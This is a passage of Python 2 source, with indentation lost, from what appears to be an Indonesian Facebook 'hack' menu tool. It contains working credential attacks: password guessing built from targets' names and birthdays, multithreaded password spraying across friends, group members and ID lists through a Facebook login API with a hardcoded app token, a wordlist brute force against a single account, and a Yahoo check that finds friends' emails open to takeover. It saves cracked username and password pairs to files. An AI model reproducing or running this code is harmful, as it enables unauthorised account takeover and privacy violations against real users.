print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
